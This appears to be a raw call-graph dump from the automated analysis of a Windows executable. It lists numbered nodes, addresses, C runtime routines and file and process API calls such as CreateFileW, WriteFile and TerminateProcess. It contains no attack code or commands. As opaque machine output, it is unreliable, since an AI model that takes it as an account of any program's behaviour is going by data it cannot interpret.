100020->100016 100021->99924 100022->99966 100023->99932 100024->99931 100025->99932 100026->99942 100027->99950 100028->99966 100029->99941 100030->99967 100031->99982 100032->99967 100033->99980 100034->99985 100035->99963 100036->99967 100037->99925 100038->99931 100039->99966 100041 8b0fa3 __setmode 100040->100041 100042 8b0fb0 100041->100042 100043 8b0fc7 100041->100043 100045 8a8d34 __chsize_nolock 58 API calls 100042->100045 100044 8b108b 100043->100044 100046 8b0fdb 100043->100046 100047 8a8d34 __chsize_nolock 58 API calls 100044->100047 100048 8b0fb5 100045->100048 100049 8b0ff9 100046->100049 100050 8b1006 100046->100050 100051 8b0ffe 100047->100051 100052 8a8d68 __mbstowcs_l_helper 58 API calls 100048->100052 100053 8a8d34 __chsize_nolock 58 API calls 100049->100053 100054 8b1028 100050->100054 100055 8b1013 100050->100055 100058 8a8d68 __mbstowcs_l_helper 58 API calls 100051->100058 100067 8b0fbc __setmode 100052->100067 100053->100051 100057 8ad446 ___lock_fhandle 59 API calls 100054->100057 100056 8a8d34 __chsize_nolock 58 API calls 100055->100056 100059 8b1018 100056->100059 100060 8b102e 100057->100060 100061 8b1020 100058->100061 100062 8a8d68 __mbstowcs_l_helper 58 API calls 100059->100062 100063 8b1041 100060->100063 100064 8b1054 100060->100064 100065 8a8ff6 __mbstowcs_l_helper 9 API calls 100061->100065 100062->100061 100068 8b10ab __read_nolock 70 API calls 100063->100068 100066 8a8d68 __mbstowcs_l_helper 58 API calls 100064->100066 100065->100067 100070 8b1059 100066->100070 100067->99998 100069 8b104d 100068->100069 100072 8b1083 __read LeaveCriticalSection 100069->100072 100071 8a8d34 __chsize_nolock 58 API calls 100070->100071 100071->100069 100072->100067 100073->99989 100074->99997 100075->99992 100079 8a543a GetSystemTimeAsFileTime 100076->100079 100078 8e91f8 100078->99671 100080 8a5468 __aulldiv 100079->100080 100080->100078 100082 8a5e9c __setmode 100081->100082 100083 8a5eae 100082->100083 100084 8a5ec3 100082->100084 100095 8a8d68 58 API calls __getptd_noexit 100083->100095 100086 8a6e4e __lock_file 59 API calls 100084->100086 100088 8a5ec9 100086->100088 100087 8a5eb3 100096 8a8ff6 9 API calls __mbstowcs_l_helper 100087->100096 100097 8a5b00 67 API calls 6 library calls 100088->100097 100091 8a5ed4 100098 8a5ef4 LeaveCriticalSection LeaveCriticalSection _fprintf 100091->100098 100092 8a5ebe __setmode 100092->99676 100094 8a5ee6 100094->100092 100095->100087 100096->100092 100097->100091 100098->100094 100100 8880fa _memmove 100099->100100 100101 8880e7 100099->100101 100100->99538 100101->100100 100102 8a0ff6 Mailbox 59 API calls 100101->100102 100102->100100 100103->99547 100104->99561 100105->99563 100106->99560 100107->99568 100109 8892c9 Mailbox 100108->100109 100110 8bf5c8 100109->100110 100114 8892d3 100109->100114 100111 8a0ff6 Mailbox 59 API calls 100110->100111 100113 8bf5d4 100111->100113 100112 8892da 100112->99573 100114->100112 100116 889df0 100114->100116 100118 889dfb 100116->100118 100117 889e32 100117->100114 100118->100117 100121 888e34 59 API calls Mailbox 100118->100121 100120 889e5d 100120->100114 100121->100120 100122->99579 100123->99577 100126 8e99d2 _wcscmp _W_expandtime 100124->100126 100125 88506b 74 API calls 100125->100126 100126->100125 100127 8e9393 GetSystemTimeAsFileTime 100126->100127 100128 8e9866 100126->100128 100129 885045 85 API calls 100126->100129 100127->100126 100128->99589 100128->99616 100129->100126 100131 8e8da9 100130->100131 100132 8e8d9b 100130->100132 100134 8e8dee 100131->100134 100135 8a548b 115 API calls 100131->100135 100145 8e8db2 100131->100145 100133 8a548b 115 API calls 100132->100133 100133->100131 100161 8e901b 100134->100161 100137 8e8dd3 100135->100137 100137->100134 100138 8e8ddc 100137->100138 100142 8a55d6 __fcloseall 83 API calls 100138->100142 100138->100145 100139 8e8e32 100140 8e8e36 100139->100140 100141 8e8e57 100139->100141 100144 8e8e43 100140->100144 100147 8a55d6 __fcloseall 83 API calls 100140->100147 100165 8e8c33 100141->100165 100142->100145 100144->100145 100150 8a55d6 __fcloseall 83 API calls 100144->100150 100145->99618 100147->100144 100148 8e8e85 100174 8e8eb5 100148->100174 100149 8e8e65 100153 8a55d6 __fcloseall 83 API calls 100149->100153 100154 8e8e72 100149->100154 100150->100145 100153->100154 100154->100145 100156 8a55d6 __fcloseall 83 API calls 100154->100156 100156->100145 100158 8e8ea0 100158->100145 100160 8a55d6 __fcloseall 83 API calls 100158->100160 100160->100145 100162 8e9040 100161->100162 100164 8e9029 _memmove _W_expandtime 100161->100164 100163 8a5812 __fread_nolock 74 API calls 100162->100163 100163->100164 100164->100139 100166 8a594c _W_store_winword 58 API calls 100165->100166 100167 8e8c42 100166->100167 100168 8a594c _W_store_winword 58 API calls 100167->100168 100169 8e8c56 100168->100169 100170 8a594c _W_store_winword 58 API calls 100169->100170 100171 8e8c6a 100170->100171 100172 8e8f97 58 API calls 100171->100172 100173 8e8c7d 100171->100173 100172->100173 100173->100148 100173->100149 100175 8e8eca 100174->100175 100176 8e8f82 100175->100176 100178 8e8e8c 100175->100178 100179 8e8c8f 74 API calls 100175->100179 100207 8e8d2b 74 API calls 100175->100207 100208 8e909c 80 API calls 100175->100208 100203 8e91bf 100176->100203 100182 8e8f97 100178->100182 100179->100175 100183 8e8fa4 100182->100183 100186 8e8faa 100182->100186 100184 8a2f95 _free 58 API calls 100183->100184 100184->100186 100185 8e8fbb 100188 8e8e93 100185->100188 100189 8a2f95 _free 58 API calls 100185->100189 100186->100185 100187 8a2f95 _free 58 API calls 100186->100187 100187->100185 100188->100158 100190 8a55d6 100188->100190 100189->100188 100191 8a55e2 __setmode 100190->100191 100192 8a560e 100191->100192 100193 8a55f6 100191->100193 100196 8a6e4e __lock_file 59 API calls 100192->100196 100199 8a5606 __setmode 100192->100199 100290 8a8d68 58 API calls __getptd_noexit 100193->100290 100195 8a55fb 100291 8a8ff6 9 API calls __mbstowcs_l_helper 100195->100291 100198 8a5620 100196->100198 100274 8a556a 100198->100274 100199->100158 100204 8e91cc 100203->100204 100205 8e91dd 100203->100205 100209 8a4a93 100204->100209 100205->100178 100207->100175 100208->100175 100210 8a4a9f __setmode 100209->100210 100211 8a4abd 100210->100211 100212 8a4ad5 100210->100212 100213 8a4acd __setmode 100210->100213 100234 8a8d68 58 API calls __getptd_noexit 100211->100234 100215 8a6e4e __lock_file 59 API calls 100212->100215 100213->100205 100217 8a4adb 100215->100217 100216 8a4ac2 100235 8a8ff6 9 API calls __mbstowcs_l_helper 100216->100235 100222 8a493a 100217->100222 100225 8a4949 100222->100225 100230 8a4967 100222->100230 100223 8a4957 100265 8a8d68 58 API calls __getptd_noexit 100223->100265 100225->100223 100227 8a4981 _memmove 100225->100227 100225->100230 100226 8a495c 100266 8a8ff6 9 API calls __mbstowcs_l_helper 100226->100266 100227->100230 100232 8a4916 __stbuf 58 API calls 100227->100232 100237 8adac6 100227->100237 100267 8a4c6d 100227->100267 100273 8ab05e 78 API calls 6 library calls 100227->100273 100236 8a4b0d LeaveCriticalSection LeaveCriticalSection _fprintf 100230->100236 100232->100227 100234->100216 100235->100213 100236->100213 100238 8adad2 __setmode 100237->100238 100239 8adadf 100238->100239 100240 8adaf6 100238->100240 100242 8a8d34 __chsize_nolock 58 API calls 100239->100242 100241 8adb95 100240->100241 100243 8adb0a 100240->100243 100244 8a8d34 __chsize_nolock 58 API calls 100241->100244 100245 8adae4 100242->100245 100247 8adb28 100243->100247 100248 8adb32 100243->100248 100251 8adb2d 100244->100251 100246 8a8d68 __mbstowcs_l_helper 58 API calls 100245->100246 100261 8adaeb __setmode 100246->100261 100249 8a8d34 __chsize_nolock 58 API calls 100247->100249 100250 8ad446 ___lock_fhandle 59 API calls 100248->100250 100249->100251 100252 8adb38 100250->100252 100253 8a8d68 __mbstowcs_l_helper 58 API calls 100251->100253 100254 8adb4b 100252->100254 100255 8adb5e 100252->100255 100256 8adba1 100253->100256 100257 8adbb5 __write_nolock 76 API calls 100254->100257 100259 8a8d68 __mbstowcs_l_helper 58 API calls 100255->100259 100258 8a8ff6 __mbstowcs_l_helper 9 API calls 100256->100258 100262 8adb57 100257->100262 100258->100261 100260 8adb63 100259->100260 100263 8a8d34 __chsize_nolock 58 API calls 100260->100263 100261->100227 100264 8adb8d __write LeaveCriticalSection 100262->100264 100263->100262 100264->100261 100265->100226 100266->100230 100268 8a4c80 100267->100268 100272 8a4ca4 100267->100272 100269 8a4916 __stbuf 58 API calls 100268->100269 100268->100272 100270 8a4c9d 100269->100270 100271 8adac6 __write 78 API calls 100270->100271 100271->100272 100272->100227 100273->100227 100275 8a5579 100274->100275 100276 8a558d 100274->100276 100323 8a8d68 58 API calls __getptd_noexit 100275->100323 100278 8a4c6d __flush 78 API calls 100276->100278 100283 8a5589 100276->100283 100280 8a5599 100278->100280 100279 8a557e 100324 8a8ff6 9 API calls __mbstowcs_l_helper 100279->100324 100293 8b0dc7 100280->100293 100292 8a5645 LeaveCriticalSection LeaveCriticalSection _fprintf 100283->100292 100285 8a4916 __stbuf 58 API calls 100286 8a55a7 100285->100286 100297 8b0c52 100286->100297 100288 8a55ad 100288->100283 100289 8a2f95 _free 58 API calls 100288->100289 100289->100283 100290->100195 100291->100199 100292->100199 100294 8a55a1 100293->100294 100295 8b0dd4 100293->100295 100294->100285 100295->100294 100296 8a2f95 _free 58 API calls 100295->100296 100296->100294 100298 8b0c5e __setmode 100297->100298 100299 8b0c6b 100298->100299 100300 8b0c82 100298->100300 100349 8a8d34 58 API calls __getptd_noexit 100299->100349 100302 8b0d0d 100300->100302 100304 8b0c92 100300->100304 100354 8a8d34 58 API calls __getptd_noexit 100302->100354 100303 8b0c70 100350 8a8d68 58 API calls __getptd_noexit 100303->100350 100307 8b0cba 100304->100307 100308 8b0cb0 100304->100308 100325 8ad446 100307->100325 100351 8a8d34 58 API calls __getptd_noexit 100308->100351 100309 8b0cb5 100355 8a8d68 58 API calls __getptd_noexit 100309->100355 100312 8b0cc0 100314 8b0cde 100312->100314 100315 8b0cd3 100312->100315 100352 8a8d68 58 API calls __getptd_noexit 100314->100352 100334 8b0d2d 100315->100334 100316 8b0d19 100356 8a8ff6 9 API calls __mbstowcs_l_helper 100316->100356 100319 8b0c77 __setmode 100319->100288 100321 8b0cd9 100353 8b0d05 LeaveCriticalSection __unlock_fhandle 100321->100353 100323->100279 100324->100283 100326 8ad452 __setmode 100325->100326 100327 8ad4a1 EnterCriticalSection 100326->100327 100328 8a9e4b __lock 58 API calls 100326->100328 100330 8ad4c7 __setmode 100327->100330 100329 8ad477 100328->100329 100331 8ad48f 100329->100331 100357 8aa06b InitializeCriticalSectionAndSpinCount 100329->100357 100330->100312 100358 8ad4cb LeaveCriticalSection _doexit 100331->100358 100359 8ad703 100334->100359 100336 8b0d91 100372 8ad67d 59 API calls 2 library calls 100336->100372 100338 8b0d3b 100338->100336 100339 8ad703 __lseeki64_nolock 58 API calls 100338->100339 100348 8b0d6f 100338->100348 100343 8b0d66 100339->100343 100340 8ad703 __lseeki64_nolock 58 API calls 100344 8b0d7b FindCloseChangeNotification 100340->100344 100341 8b0dbb 100341->100321 100342 8b0d99 100342->100341 100373 8a8d47 58 API calls 3 library calls 100342->100373 100346 8ad703 __lseeki64_nolock 58 API calls 100343->100346 100344->100336 100347 8b0d87 GetLastError 100344->100347 100346->100348 100347->100336 100348->100336 100348->100340 100349->100303 100350->100319 100351->100309 100352->100321 100353->100319 100354->100309 100355->100316 100356->100319 100357->100331 100358->100327 100360 8ad70e 100359->100360 100361 8ad723 100359->100361 100362 8a8d34 __chsize_nolock 58 API calls 100360->100362 100363 8a8d34 __chsize_nolock 58 API calls 100361->100363 100365 8ad748 100361->100365 100364 8ad713 100362->100364 100366 8ad752 100363->100366 100367 8a8d68 __mbstowcs_l_helper 58 API calls 100364->100367 100365->100338 100368 8a8d68 __mbstowcs_l_helper 58 API calls 100366->100368 100369 8ad71b 100367->100369 100370 8ad75a 100368->100370 100369->100338 100371 8a8ff6 __mbstowcs_l_helper 9 API calls 100370->100371 100371->100369 100372->100342 100373->100341 100375 8b1b90 __ftell_nolock 100374->100375 100376 8a09e2 GetLongPathNameW 100375->100376 100377 887d2c 59 API calls 100376->100377 100378 88741d 100377->100378 100379 88716b 100378->100379 100380 8877c7 59 API calls 100379->100380 100381 88717d 100380->100381 100382 8848ae 60 API calls 100381->100382 100383 887188 100382->100383 100384 8becae 100383->100384 100385 887193 100383->100385 100389 8becc8 100384->100389 100432 887a68 61 API calls 100384->100432 100386 883f84 59 API calls 100385->100386 100388 88719f 100386->100388 100426 8834c2 100388->100426 100391 8871b2 Mailbox 100391->99382 100393 884f3d 136 API calls 100392->100393 100394 8869ef 100393->100394 100395 8be45a 100394->100395 100396 884f3d 136 API calls 100394->100396 100397 8e97e5 122 API calls 100395->100397 100398 886a03 100396->100398 100399 8be46f 100397->100399 100398->100395 100400 886a0b 100398->100400 100401 8be473 100399->100401 100402 8be490 100399->100402 100404 8be47b 100400->100404 100405 886a17 100400->100405 100406 884faa 84 API calls 100401->100406 100403 8a0ff6 Mailbox 59 API calls 100402->100403 100422 8be4d5 Mailbox 100403->100422 100540 8e4534 90 API calls _wprintf 100404->100540 100433 886bec 100405->100433 100406->100404 100409 8be489 100409->100402 100411 8be689 100412 8a2f95 _free 58 API calls 100411->100412 100413 8be691 100412->100413 100414 884faa 84 API calls 100413->100414 100419 8be69a 100414->100419 100418 8a2f95 _free 58 API calls 100418->100419 100419->100418 100421 884faa 84 API calls 100419->100421 100544 8dfcb1 89 API calls 4 library calls 100419->100544 100421->100419 100422->100411 100422->100419 100423 887f41 59 API calls 100422->100423 100526 88766f 100422->100526 100534 8874bd 100422->100534 100541 8dfc4d 59 API calls 2 library calls 100422->100541 100542 8dfb6e 61 API calls 2 library calls 100422->100542 100543 8e7621 59 API calls Mailbox 100422->100543 100423->100422 100427 8834d4 100426->100427 100431 8834f3 _memmove 100426->100431 100429 8a0ff6 Mailbox 59 API calls 100427->100429 100428 8a0ff6 Mailbox 59 API calls 100430 88350a 100428->100430 100429->100431 100430->100391 100431->100428 100432->100384 100434 8be847 100433->100434 100435 886c15 100433->100435 100636 8dfcb1 89 API calls 4 library calls 100434->100636 100550 885906 60 API calls Mailbox 100435->100550 100438 8be85a 100637 8dfcb1 89 API calls 4 library calls 100438->100637 100439 886c37 100551 885956 100439->100551 100442 886c54 100444 8877c7 59 API calls 100442->100444 100446 886c60 100444->100446 100445 8be876 100448 886cc1 100445->100448 100564 8a0b9b 60 API calls __ftell_nolock 100446->100564 100450 8be889 100448->100450 100451 886ccf 100448->100451 100449 886c6c 100453 8877c7 59 API calls 100449->100453 100454 885dcf CloseHandle 100450->100454 100452 8877c7 59 API calls 100451->100452 100455 886cd8 100452->100455 100456 886c78 100453->100456 100457 8be895 100454->100457 100458 8877c7 59 API calls 100455->100458 100459 8848ae 60 API calls 100456->100459 100460 884f3d 136 API calls 100457->100460 100462 886ce1 100458->100462 100463 886c86 100459->100463 100461 8be8b1 100460->100461 100464 8be8da 100461->100464 100467 8e97e5 122 API calls 100461->100467 100574 8846f9 100462->100574 100565 8859b0 ReadFile SetFilePointerEx 100463->100565 100638 8dfcb1 89 API calls 4 library calls 100464->100638 100471 8be8cd 100467->100471 100470 886cb2 100566 885c4e 100470->100566 100475 8be8f6 100471->100475 100476 8be8d5 100471->100476 100473 8be8f1 100504 886e6c Mailbox 100473->100504 100479 884faa 84 API calls 100475->100479 100478 884faa 84 API calls 100476->100478 100478->100464 100480 8be8fb 100479->100480 100481 8a0ff6 Mailbox 59 API calls 100480->100481 100487 8be92f 100481->100487 100485 883bcd 100485->99249 100485->99272 100489 88766f 59 API calls 100487->100489 100523 8be978 Mailbox 100489->100523 100492 8beb69 100643 8e7581 59 API calls Mailbox 100492->100643 100497 8beb8b 100644 8ef835 59 API calls 2 library calls 100497->100644 100500 8beb98 100502 8a2f95 _free 58 API calls 100500->100502 100502->100504 100545 885934 100504->100545 100507 88766f 59 API calls 100507->100523 100516 887f41 59 API calls 100516->100523 100519 8bebbb 100645 8dfcb1 89 API calls 4 library calls 100519->100645 100522 8bebd4 100524 8a2f95 _free 58 API calls 100522->100524 100523->100492 100523->100507 100523->100516 100523->100519 100639 8dfc4d 59 API calls 2 library calls 100523->100639 100640 8dfb6e 61 API calls 2 library calls 100523->100640 100641 8e7621 59 API calls Mailbox 100523->100641 100642 887373 59 API calls Mailbox 100523->100642 100525 8bebe7 100524->100525 100525->100504 100527 88770f 100526->100527 100531 887682 _memmove 100526->100531 100529 8a0ff6 Mailbox 59 API calls 100527->100529 100528 8a0ff6 Mailbox 59 API calls 100530 887689 100528->100530 100529->100531 100532 8a0ff6 Mailbox 59 API calls 100530->100532 100533 8876b2 100530->100533 100531->100528 100532->100533 100533->100422 100535 8874d0 100534->100535 100538 88757e 100534->100538 100537 8a0ff6 Mailbox 59 API calls 100535->100537 100539 887502 100535->100539 100536 8a0ff6 59 API calls Mailbox 100536->100539 100537->100539 100538->100422 100539->100536 100539->100538 100540->100409 100541->100422 100542->100422 100543->100422 100544->100419 100546 885dcf CloseHandle 100545->100546 100547 88593c Mailbox 100546->100547 100548 885dcf CloseHandle 100547->100548 100549 88594b 100548->100549 100549->100485 100550->100439 100552 885dcf CloseHandle 100551->100552 100553 885962 100552->100553 100648 885df9 100553->100648 100555 885981 100559 8859a4 100555->100559 100656 885770 100555->100656 100557 885993 100673 8853db SetFilePointerEx SetFilePointerEx 100557->100673 100559->100438 100559->100442 100560 8be030 100674 8e3696 SetFilePointerEx SetFilePointerEx WriteFile 100560->100674 100561 88599a 100561->100559 100561->100560 100563 8be060 100563->100559 100564->100449 100565->100470 100573 885c68 100566->100573 100567 885cef SetFilePointerEx 100680 885dae SetFilePointerEx 100567->100680 100568 8be151 100681 885dae SetFilePointerEx 100568->100681 100571 8be16b 100572 885cc3 100572->100448 100573->100567 100573->100568 100573->100572 100575 8877c7 59 API calls 100574->100575 100576 88470f 100575->100576 100577 8877c7 59 API calls 100576->100577 100578 884717 100577->100578 100579 8877c7 59 API calls 100578->100579 100580 88471f 100579->100580 100581 8877c7 59 API calls 100580->100581 100582 884727 100581->100582 100583 8bd8fb 100582->100583 100584 88475b 100582->100584 100585 8881a7 59 API calls 100583->100585 100586 8879ab 59 API calls 100584->100586 100587 8bd904 100585->100587 100588 884769 100586->100588 100589 887eec 59 API calls 100587->100589 100590 887e8c 59 API calls 100588->100590 100592 88479e 100589->100592 100591 884773 100590->100591 100591->100592 100593 8879ab 59 API calls 100591->100593 100594 8847de 100592->100594 100595 8847bd 100592->100595 100607 8bd924 100592->100607 100596 884794 100593->100596 100682 8879ab 100594->100682 100600 887b52 59 API calls 100595->100600 100599 887e8c 59 API calls 100596->100599 100598 8bd9f4 100603 887d2c 59 API calls 100598->100603 100599->100592 100604 8847c7 100600->100604 100601 8847ef 100602 884801 100601->100602 100605 8881a7 59 API calls 100601->100605 100606 884811 100602->100606 100608 8881a7 59 API calls 100602->100608 100614 8bd9b1 100603->100614 100604->100594 100611 8879ab 59 API calls 100604->100611 100605->100602 100607->100598 100609 8bd9dd 100607->100609 100622 8bd95b 100607->100622 100608->100606 100609->100598 100616 8bd9c8 100609->100616 100611->100594 100614->100594 100615 887b52 59 API calls 100614->100615 100695 887a84 59 API calls 2 library calls 100614->100695 100615->100614 100620 887d2c 59 API calls 100616->100620 100617 8bd9b9 100619 887d2c 59 API calls 100617->100619 100619->100614 100620->100614 100622->100617 100623 8bd9a4 100622->100623 100624 887d2c 59 API calls 100623->100624 100624->100614 100636->100438 100637->100445 100638->100473 100639->100523 100640->100523 100641->100523 100642->100523 100643->100497 100644->100500 100645->100522 100649 8be181 100648->100649 100650 885e12 CreateFileW 100648->100650 100651 885e34 100649->100651 100652 8be187 CreateFileW 100649->100652 100650->100651 100651->100555 100652->100651 100653 8be1ad 100652->100653 100654 885c4e 2 API calls 100653->100654 100655 8be1b8 100654->100655 100655->100651 100657 88578b 100656->100657 100658 8bdfce 100656->100658 100659 885c4e 2 API calls 100657->100659 100672 88581a 100657->100672 100658->100672 100675 885e3f 100658->100675 100660 8857ad 100659->100660 100662 88538e 59 API calls 100660->100662 100663 8857b7 100662->100663 100663->100658 100664 8857c4 100663->100664 100665 8a0ff6 Mailbox 59 API calls 100664->100665 100666 8857cf 100665->100666 100667 88538e 59 API calls 100666->100667 100668 8857da 100667->100668 100669 885d20 2 API calls 100668->100669 100670 885807 100669->100670 100671 885c4e 2 API calls 100670->100671 100671->100672 100672->100557 100673->100561 100674->100563 100676 885c4e 2 API calls 100675->100676 100677 885e60 100676->100677 100678 885c4e 2 API calls 100677->100678 100679 885e74 100678->100679 100679->100672 100680->100572 100681->100571 100683 8879ba 100682->100683 100684 887a17 100682->100684 100683->100684 100686 8879c5 100683->100686 100685 887e8c 59 API calls 100684->100685 100692 8879e8 _memmove 100685->100692 100687 8879e0 100686->100687 100688 8bef32 100686->100688 100696 888087 59 API calls Mailbox 100687->100696 100689 888189 59 API calls 100688->100689 100691 8bef3c 100689->100691 100693 8a0ff6 Mailbox 59 API calls 100691->100693 100692->100601 100694 8bef5c 100693->100694 100695->100614 100696->100692 100698 886ef5 100697->100698 100702 887009 100697->100702 100699 8a0ff6 Mailbox 59 API calls 100698->100699 100698->100702 100701 886f1c 100699->100701 100700 8a0ff6 Mailbox 59 API calls 100703 886f91 100700->100703 100701->100700 100702->99388 100703->100702 100706 8874bd 59 API calls 100703->100706 100707 88766f 59 API calls 100703->100707 100710 8863a0 100703->100710 100735 8d6ac9 59 API calls Mailbox 100703->100735 100706->100703 100707->100703 100708->99391 100709->99393 100735->100703 101172 8c0226 101178 88ade2 Mailbox 101172->101178 101174 8c0c86 101330 8d66f4 101174->101330 101176 8c0c8f 101177 889df0 Mailbox 59 API calls 101177->101178 101178->101174 101178->101176 101178->101177 101179 8c00e0 VariantClear 101178->101179 101180 88b6c1 101178->101180 101182 8f474d 331 API calls 101178->101182 101188 8ed2e6 101178->101188 101235 8fe237 101178->101235 101238 892123 101178->101238 101278 8fe24b 101178->101278 101281 8ed2e5 101178->101281 101328 8d7405 59 API calls 101178->101328 101179->101178 101329 8ea0b5 89 API calls 4 library calls 101180->101329 101182->101178 101189 8ed310 101188->101189 101190 8ed305 101188->101190 101194 8877c7 59 API calls 101189->101194 101233 8ed3ea Mailbox 101189->101233 101333 889c9c 59 API calls 101190->101333 101192 8a0ff6 Mailbox 59 API calls 101193 8ed433 101192->101193 101195 8ed43f 101193->101195 101336 885906 60 API calls Mailbox 101193->101336 101196 8ed334 101194->101196 101199 889997 84 API calls 101195->101199 101198 8877c7 59 API calls 101196->101198 101200 8ed33d 101198->101200 101201 8ed457 101199->101201 101202 889997 84 API calls 101200->101202 101203 885956 67 API calls 101201->101203 101204 8ed349 101202->101204 101206 8ed466 101203->101206 101205 8846f9 59 API calls 101204->101205 101207 8ed35e 101205->101207 101208 8ed49e 101206->101208 101209 8ed46a GetLastError 101206->101209 101211 887c8e 59 API calls 101207->101211 101213 8ed4c9 101208->101213 101214 8ed500 101208->101214 101210 8ed483 101209->101210 101231 8ed3f3 Mailbox 101210->101231 101337 885a1a CloseHandle 101210->101337 101212 8ed391 101211->101212 101215 8ed3e3 101212->101215 101220 8e3e73 3 API calls 101212->101220 101217 8a0ff6 Mailbox 59 API calls 101213->101217 101216 8a0ff6 Mailbox 59 API calls 101214->101216 101335 889c9c 59 API calls 101215->101335 101221 8ed505 101216->101221 101222 8ed4ce 101217->101222 101223 8ed3a1 101220->101223 101227 8877c7 59 API calls 101221->101227 101221->101231 101224 8ed4df 101222->101224 101225 8877c7 59 API calls 101222->101225 101223->101215 101226 8ed3a5 101223->101226 101338 8ef835 59 API calls 2 library calls 101224->101338 101225->101224 101229 887f41 59 API calls 101226->101229 101227->101231 101230 8ed3b2 101229->101230 101334 8e3c66 63 API calls Mailbox 101230->101334 101231->101178 101233->101192 101233->101231 101234 8ed3bb Mailbox 101234->101215 101339 8fcdf1 101235->101339 101237 8fe247 101237->101178 101239 889bf8 59 API calls 101238->101239 101240 89213b 101239->101240 101242 8a0ff6 Mailbox 59 API calls 101240->101242 101245 8c69af 101240->101245 101243 892154 101242->101243 101244 892164 101243->101244 101450 885906 60 API calls Mailbox 101243->101450 101248 889997 84 API calls 101244->101248 101246 892189 101245->101246 101453 8ef7df 59 API calls 101245->101453 101254 892196 101246->101254 101454 889c9c 59 API calls 101246->101454 101250 892172 101248->101250 101252 885956 67 API calls 101250->101252 101251 8c69f7 101253 8c69ff 101251->101253 101251->101254 101255 892181 101252->101255 101455 889c9c 59 API calls 101253->101455 101257 885e3f 2 API calls 101254->101257 101255->101245 101255->101246 101452 885a1a CloseHandle 101255->101452 101259 89219d 101257->101259 101260 8c6a11 101259->101260 101261 8921b7 101259->101261 101263 8a0ff6 Mailbox 59 API calls 101260->101263 101262 8877c7 59 API calls 101261->101262 101264 8921bf 101262->101264 101265 8c6a17 101263->101265 101429 8856d2 101264->101429 101267 8c6a2b 101265->101267 101456 8859b0 ReadFile SetFilePointerEx 101265->101456 101272 8c6a2f _memmove 101267->101272 101457 8e794e 59 API calls 2 library calls 101267->101457 101269 8921ce 101269->101272 101444 889b9c 101269->101444 101273 8921e2 Mailbox 101274 89221c 101273->101274 101275 885dcf CloseHandle 101273->101275 101274->101178 101276 892210 101275->101276 101276->101274 101451 885a1a CloseHandle 101276->101451 101279 8fcdf1 130 API calls 101278->101279 101280 8fe25b 101279->101280 101280->101178 101282 8ed310 101281->101282 101283 8ed305 101281->101283 101287 8877c7 59 API calls 101282->101287 101326 8ed3ea Mailbox 101282->101326 101461 889c9c 59 API calls 101283->101461 101285 8a0ff6 Mailbox 59 API calls 101286 8ed433 101285->101286 101288 8ed43f 101286->101288 101464 885906 60 API calls Mailbox 101286->101464 101289 8ed334 101287->101289 101292 889997 84 API calls 101288->101292 101291 8877c7 59 API calls 101289->101291 101293 8ed33d 101291->101293 101294 8ed457 101292->101294 101295 889997 84 API calls 101293->101295 101296 885956 67 API calls 101294->101296 101297 8ed349 101295->101297 101299 8ed466 101296->101299 101298 8846f9 59 API calls 101297->101298 101300 8ed35e 101298->101300 101301 8ed49e 101299->101301 101302 8ed46a GetLastError 101299->101302 101304 887c8e 59 API calls 101300->101304 101306 8ed4c9 101301->101306 101307 8ed500 101301->101307 101303 8ed483 101302->101303 101323 8ed3f3 Mailbox 101303->101323 101465 885a1a CloseHandle 101303->101465 101305 8ed391 101304->101305 101308 8ed3e3 101305->101308 101313 8e3e73 3 API calls 101305->101313 101310 8a0ff6 Mailbox 59 API calls 101306->101310 101309 8a0ff6 Mailbox 59 API calls 101307->101309 101463 889c9c 59 API calls 101308->101463 101314 8ed505 101309->101314 101315 8ed4ce 101310->101315 101316 8ed3a1 101313->101316 101320 8877c7 59 API calls 101314->101320 101314->101323 101317 8ed4df 101315->101317 101318 8877c7 59 API calls 101315->101318 101316->101308 101319 8ed3a5 101316->101319 101466 8ef835 59 API calls 2 library calls 101317->101466 101318->101317 101322 887f41 59 API calls 101319->101322 101320->101323 101324 8ed3b2 101322->101324 101323->101178 101462 8e3c66 63 API calls Mailbox 101324->101462 101326->101285 101326->101323 101327 8ed3bb Mailbox 101327->101308 101328->101178 101329->101174 101467 8d6636 101330->101467 101332 8d6702 101332->101176 101333->101189 101334->101234 101335->101233 101336->101195 101337->101231 101338->101231 101340 889997 84 API calls 101339->101340 101341 8fce2e 101340->101341 101343 8fce75 Mailbox 101341->101343 101377 8fdab9 101341->101377 101343->101237 101344 8fd242 101416 8fdbdc 92 API calls Mailbox 101344->101416 101347 8fd251 101348 8fd0db 101347->101348 101349 8fd25d 101347->101349 101390 8fcc82 101348->101390 101349->101343 101350 889997 84 API calls 101369 8fcec6 Mailbox 101350->101369 101355 8fd114 101405 8a0e48 101355->101405 101358 8fd12e 101411 8ea0b5 89 API calls 4 library calls 101358->101411 101359 8fd147 101361 88942e 59 API calls 101359->101361 101364 8fd153 101361->101364 101362 8fd139 GetCurrentProcess TerminateProcess 101362->101359 101363 8fd0cd 101363->101344 101363->101348 101365 8891b0 59 API calls 101364->101365 101366 8fd169 101365->101366 101376 8fd190 101366->101376 101412 888ea0 59 API calls Mailbox 101366->101412 101367 8fd2b8 101367->101343 101372 8fd2cc FreeLibrary 101367->101372 101369->101343 101369->101350 101369->101363 101409 8ef835 59 API calls 2 library calls 101369->101409 101410 8fd2f3 61 API calls 2 library calls 101369->101410 101370 8fd17f 101413 8fd95d 107 API calls _free 101370->101413 101372->101343 101376->101367 101414 888ea0 59 API calls Mailbox 101376->101414 101415 889e9c 60 API calls Mailbox 101376->101415 101417 8fd95d 107 API calls _free 101376->101417 101378 887faf 59 API calls 101377->101378 101379 8fdad4 CharLowerBuffW 101378->101379 101418 8df658 101379->101418 101383 8877c7 59 API calls 101384 8fdb0d 101383->101384 101385 8879ab 59 API calls 101384->101385 101386 8fdb24 101385->101386 101387 887e8c 59 API calls 101386->101387 101388 8fdb30 Mailbox 101387->101388 101389 8fdb6c Mailbox 101388->101389 101425 8fd2f3 61 API calls 2 library calls 101388->101425 101389->101369 101391 8fcc9d 101390->101391 101395 8fccf2 101390->101395 101392 8a0ff6 Mailbox 59 API calls 101391->101392 101393 8fccbf 101392->101393 101394 8a0ff6 Mailbox 59 API calls 101393->101394 101393->101395 101394->101393 101396 8fdd64 101395->101396 101397 8fdf8d Mailbox 101396->101397 101404 8fdd87 _strcat _wcscpy __NMSG_WRITE 101396->101404 101397->101355 101398 889d46 59 API calls 101398->101404 101399 889c9c 59 API calls 101399->101404 101400 889cf8 59 API calls 101400->101404 101401 889997 84 API calls 101401->101404 101402 8a594c 58 API calls _W_store_winword 101402->101404 101404->101397 101404->101398 101404->101399 101404->101400 101404->101401 101404->101402 101428 8e5b29 61 API calls 